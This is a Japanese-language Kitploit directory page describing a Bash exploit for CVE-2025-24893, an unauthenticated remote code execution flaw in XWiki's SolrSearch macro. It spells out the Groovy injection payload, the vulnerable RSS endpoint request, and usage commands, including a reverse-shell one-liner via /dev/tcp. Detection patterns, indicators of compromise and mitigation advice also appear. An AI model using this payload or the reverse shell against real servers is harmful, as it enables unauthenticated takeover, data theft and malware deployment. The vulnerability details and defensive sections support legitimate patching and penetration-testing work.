Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — CVE-2025-24893のBashエクスプロイト。XWiki PlatformにおけるSolrSearchマクロのテンプレートインジェクションを介した認証不要のリモートコード実行脆弱性です。 | Kitploit
ツール/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

CVE-2025-24893のBashエクスプロイト。XWiki PlatformにおけるSolrSearchマクロのテンプレートインジェクションを介した認証不要のリモートコード実行脆弱性です。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
8ヶ月前未レビュー

XWikiプラットフォーム 未認証RCEエクスプロイト

概要

このスクリプトは、CVE-2025-24893の影響を受けるXWikiプラットフォームのバージョンを標的としたエクスプロイトのリファービッシュされたBash実装です。これは、SolrSearchマクロのテンプレートインジェクションの欠陥を介して、攻撃者が任意のGroovyコードを実行できるようにする重大な未認証のリモートコード実行脆弱性を利用します。

元のPythonによるエクスプロイト実装はさまざまなセキュリティ研究者によって作成され、ここでは簡素化された実行と使いやすさの向上を図ってBashユーザー向けに適合されています。

脆弱性の詳細

  • 発見者: John Kwak (Trend Micro's Zero Day Initiative)
  • CVE: CVE-2025-24893
  • CVSSスコア: 9.8(重要)
  • 参考文献:
    • XWiki Official Security Advisory (GHSA-rr6p-3pfg-562j)
    • CISA Known Exploited Vulnerabilities Catalog
    • VulnCheck - XWiki CVE-2025-24893 Exploited in the Wild
    • OffSec Blog - Unauthenticated RCE in XWiki
  • 説明: この脆弱性は、XWikiプラットフォーム内のSolrSearchマクロにおける不適切な入力サニタイズに起因します。このマクロは、RSSメディアエンドポイントを介してアクセスされた場合に、textパラメータ内のユーザー指定入力を適切に検証およびサニタイズできず、攻撃者が認証なしでレンダリングパイプラインに悪意のあるGroovyコードを注入することを可能にします。

影響を受けるバージョンと修正バージョン

影響を受けるバージョン

  • XWikiプラットフォーム: 5.3-milestone-2 から 15.10.10
  • XWikiプラットフォーム: 16.0.0-rc-1 から 16.4.0

修正バージョン

  • XWiki 15.10.11 以降
  • XWiki 16.4.1 以降
  • XWiki 16.5.0RC1 以降

機能

  • 未認証RCE: 認証なしで任意のシステムコマンドを実行します。
  • CSRFトークンバイパス: CSRFトークンを必要とせずにテンプレートインジェクションを悪用します。
  • バックグラウンド実行: ターゲットサーバー上でコマンドを非同期に実行します。
  • シンプルなコマンドラインインターフェース: 依存関係が最小限の使いやすいBashスクリプト。

前提条件

  • 依存関係:
    • curl: HTTPリクエスト送信用。
    • jq: ペイロードのURLエンコード用。
    • Bashシェル。
  • テスト環境: Bashを搭載したLinux OS。

使用方法

実行権限を付与します:

root@kitploit:~
chmod +x CVE-2025-24893

必要な引数を指定してスクリプトを実行します:

root@kitploit:~
./CVE-2025-24893 <target_url> <command>

パラメータ

パラメータ説明
<target_url>対象のXWiki URL(例: http://example.com または https://xwiki.example.org)。プロトコルは省略可能。
<command>ターゲットサーバー上で実行するシステムコマンド。

例

ターゲットが脆弱かどうかを確認(idコマンドを実行):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"

システム情報を取得:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"

テストファイルを作成:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"

リバースシェル(自分のIPとポートに置き換えてください):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"

スクリプトのワークフロー

  1. コマンドライン引数の解析:

    • ターゲットURLとコマンドの両方が提供されていることを検証します。
    • プロトコルが指定されていない場合、URLにhttp://を追加して正規化します。
  2. ペイロードの構築:

    • .execute()を使用して指定されたコマンドを実行するGroovyコードペイロードを構築します。
    • ペイロードをXWikiマクロ構文でラップします: }}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
  3. URLエンコード:

    • jqを使用してペイロードをURLエンコードし、適切なHTTP送信を行います。
  4. エクスプロイト:

    • 脆弱なSolrSearchエンドポイントにHTTP GETリクエストを送信します: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<encoded_payload>
    • コマンドはターゲットサーバー上でバックグラウンドで実行されます。

技術的詳細

エクスプロイトの仕組み

エクスプロイトチェーンは以下のように動作します:

  1. テンプレートインジェクション: 攻撃者は、XWikiマクロ構文でラップされたGroovyコードを含む悪意のあるペイロードを作成します。
  2. エンドポイントの標的化: ペイロードは脆弱なSolrSearch RSSエンドポイントに送信されます。
  3. コード実行: 注入されたGroovyコードは認証なしでサーバー側で実行されます。
  4. システム侵害: 攻撃者はXWikiアプリケーションの権限で任意のコード実行を獲得します。

ペイロード構造

root@kitploit:~
}}}{{async async=false}}{{groovy}}'<command>'.execute();{{/groovy}}{{/async}}
  • }}} - 既存のマクロコンテキストを閉じます
  • {{async async=false}} - 同期的な実行を保証します
  • {{groovy}}...{{/groovy}} - 悪意のあるGroovyコードをラップします
  • '<command>'.execute(); - 指定されたシステムコマンドを実行します

概念実証

脆弱な環境のセットアップ

テスト目的で、Dockerを使用して脆弱なXWikiインスタンスをセットアップできます:

root@kitploit:~
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

エクスプロイトデモ

root@kitploit:~
# Wait for XWiki to start (may take 1-2 minutes)
./CVE-2025-24893 http://localhost:8080 "whoami"

影響

この脆弱性の悪用に成功すると、認証されていない攻撃者は以下を行うことができます:

  • サーバー上で任意のシステムコマンドを実行する
  • 機密データの読み取り、変更、削除
  • XWikiインストール全体を侵害する
  • ネットワーク上の他のシステムに横展開する
  • 暗号通貨マイナーやその他のマルウェアを展開する
  • 永続的なバックドアアクセスを確立する

実際の悪用事例

CISAおよび複数のセキュリティベンダーによると:

  • 活発な悪用: CVE-2025-24893は実際の環境で活発に悪用されています
  • 攻撃キャンペーン: VulnCheckは暗号通貨マイナーを展開する2段階の攻撃チェーンを検出しました
  • CISA KEVカタログ: 2025年10月30日に既知の悪用脆弱性カタログに追加されました
  • 広範なスキャン: 脆弱なインスタンスを対象とした大規模なインターネット全体のスキャン

検出と緩和

検出

SolrSearchエンドポイントへの不審なリクエストを監視します:

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

以下を含むパターンを探します:

  • {{groovy}}
  • {{async}}
  • .execute()
  • 上記のURLエンコードされたバリエーション

侵害インジケータ(IoC)

  • XWikiアプリケーションユーザーによって生成された予期しないプロセス
  • /tmpまたは他の書き込み可能なディレクトリ内の新しいファイル
  • 未知のIPへの発信ネットワーク接続
  • 暗号通貨マイニングプロセス(高いCPU使用率)

緩和策

  1. XWikiを修正バージョンにアップグレード:

    • バージョン15.10.11以降
    • バージョン16.4.1以降
    • バージョン16.5.0RC1以降
  2. 一時的な回避策を適用(直ちにパッチを適用できない場合):

    • Webアプリケーションファイアウォール(WAF)を介してSolrSearchエンドポイントへのアクセスを制限する
    • 不要な場合はSolrSearchマクロを無効にする
    • 露出を制限するためにネットワークセグメンテーションを実装する
  3. 侵害の監視:

    • 悪用試行のログを確認する
    • 不正なファイル変更を確認する
    • 暗号通貨マイナーとバックドアをスキャンする

制限事項

  • コマンドはバックグラウンドで実行されます。出力はすぐに表示されない場合があります。
  • コマンド実行の確認にはサイドチャネル手法(ファイル作成、ネットワーク接続など)が必要です。
  • ターゲットでSolrSearchマクロが有効になっている必要があります(デフォルト設定)。

謝辞

  • 脆弱性発見者: John Kwak (Trend Micro's Zero Day Initiative)
  • 元のPythonエクスプロイト作成者: さまざまなセキュリティ研究者
  • 適合スクリプト: [0xdtc]によってリファービッシュされ、BASHで構築

免責事項

このスクリプトは教育目的のみを目的としています。所有していない、またはテストする明示的な許可を得ていないシステムに対してこのツールを不正に使用することは違法であり、非倫理的です。責任を持って使用してください。

テストする前に、システム所有者から明示的な書面による許可を得る必要があります。

このツールの作成者は、このスクリプトの誤用または損害について一切責任を負いません。ユーザーは、適切な承認を得ていること、および該当するすべての法律と規制を遵守していることを確認する単独の責任を負います。

ツールをダウンロード